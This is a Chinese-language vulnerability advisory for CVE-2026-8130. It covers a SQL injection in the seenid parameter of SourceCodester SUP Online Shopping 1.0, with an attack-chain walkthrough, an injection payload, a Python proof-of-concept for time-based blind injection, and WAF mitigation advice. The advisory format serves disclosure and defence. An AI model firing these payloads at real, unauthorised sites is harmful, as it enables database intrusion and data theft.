IPBUF安全漏洞报告
English
CVE-2026-8130 CVSS 7.3 高危

CVE-2026-8130: SourceCodester SUP Online Shopping SQL注入漏洞

披露日期: 2026-05-08
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-8130
漏洞类型
SQL注入
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
SourceCodester SUP Online Shopping

相关标签

SQL注入CVE-2026-8130SourceCodesterWeb安全高危漏洞

漏洞概述

SourceCodester SUP Online Shopping 1.0 版本存在SQL注入漏洞。攻击者可利用/admin/message.php文件中的seenid参数执行恶意SQL语句。由于无需认证即可远程利用,该漏洞可能导致数据库敏感信息泄露、数据篡改,风险较高。

技术细节

该漏洞的核心在于SourceCodester SUP Online Shopping 1.0在处理/admin/message.php请求时,未对用户输入的seenid参数进行充分的过滤或转义,导致其直接拼接到SQL查询语句中。攻击者可以通过发送特制的HTTP GET或POST请求,利用UNION查询或布尔盲注等技术,从数据库中提取管理员密码等敏感数据。由于CVSS向量显示无需用户交互且无需认证,攻击门槛较低。结合公开的PoC和Metasploit模块,未修补的系统极易受到自动化攻击。

攻击链分析

STEP 1
侦察
攻击者识别出运行 SourceCodester SUP Online Shopping 1.0 的目标服务器。
STEP 2
武器化
攻击者构造针对 seenid 参数的恶意 SQL 注入 Payload,例如 '1' OR 1=1-- -。
STEP 3
投递
攻击者通过 HTTP 请求将包含恶意 Payload 的请求发送至 /admin/message.php。
STEP 4
利用
后端服务器解析请求,将未过滤的 seenid 参数拼接到 SQL 语句中执行。
STEP 5
影响
数据库执行恶意 SQL 命令,导致敏感数据泄露或被篡改。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 import requests def check_sqli(url): """ PoC for CVE-2026-8130 SQL Injection Vulnerable Parameter: seenid """ target = f"{url}/admin/message.php" # Payload for time-based blind SQL injection payload = "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -" params = {"seenid": payload} try: print(f"[*] Sending request to: {target}") response = requests.get(target, params=params, timeout=10) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed! Response delayed.") else: print("[-] Vulnerability not detected.") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") if __name__ == "__main__": target_url = "http://target-ip" # Replace with actual target check_sqli(target_url)

影响范围

SourceCodester SUP Online Shopping 1.0

防御指南

临时缓解措施
建议立即检查系统版本并应用安全补丁。若无法立即升级,应在 Web 应用防火墙(WAF)中添加规则,拦截针对 /admin/message.php 的异常请求,特别是包含 SQL 关键字(如 UNION, SELECT, SLEEP)的 seenid 参数。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。